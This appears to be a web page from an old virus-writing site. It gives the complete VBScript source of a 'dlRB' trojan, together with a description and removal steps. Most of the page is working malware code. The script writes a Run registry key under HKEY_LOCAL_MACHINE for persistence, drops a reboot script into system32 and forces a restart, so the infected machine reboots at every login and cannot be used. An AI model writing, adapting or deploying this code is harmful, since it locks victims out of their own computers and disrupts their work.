VBS/dlRB - System reboot Virus source code

When this file is ran it will create a registry entry in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\. This script will then write a script file to C:\%systemroot%\system32\ called dlRB.vbs. This file (dlRB.vbs) will reboot the computer when ran and yup you guessed it...because of the registry entry this 'reboot' file runs each time the target tries to log into Windows. After the script is done it will force a system reboot.

Classification: This Virus is NON destructive.

Method of uninfection: Boot to alternative OS, most likely you will use a DOS boot disk (make sure to add the program NTFSDOS.exe so you can mount your NTFS drives then just delete the c:\%systemroot%\system32\dlRB.vbs file. Reboot as normal. Once logged into Windows remove the registry entry. If the machine happens to have a Telnet or SSH server running you can still log in using one of those services and manually delete the file.

rem - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData

set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)

createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"

sub createRegKey(regKey,regVal)
     set regEdit = CreateObject("WScript.Shell")
     regEdit.RegWrite regKey,regVal
end sub

set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
generateCopy.close

set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")

set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem()

function setFile()
        fileData="rem - ^dlRB^ by D.L." &vbcrlf& _
	"strComputer = ^.^ " &vbcrlf& _
	"Set objWMIService = GetObject(^winmgmts:^ _  " &vbcrlf& _
	"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)" &vbcrlf& _
	"Set colOperatingSystems = objWMIService.ExecQuery _  " &vbcrlf& _
	"(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
	"For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
        "ObjOperatingSystem.Reboot()" &vbcrlf& _
	"Next"
end function

function rebootSystem()
	strComputer = "." 
 
	Set objWMIService = GetObject("winmgmts:" _ 
	& "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _   
	("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems 
        	ObjOperatingSystem.Reboot() 
	Next 
end function

Click here to go back.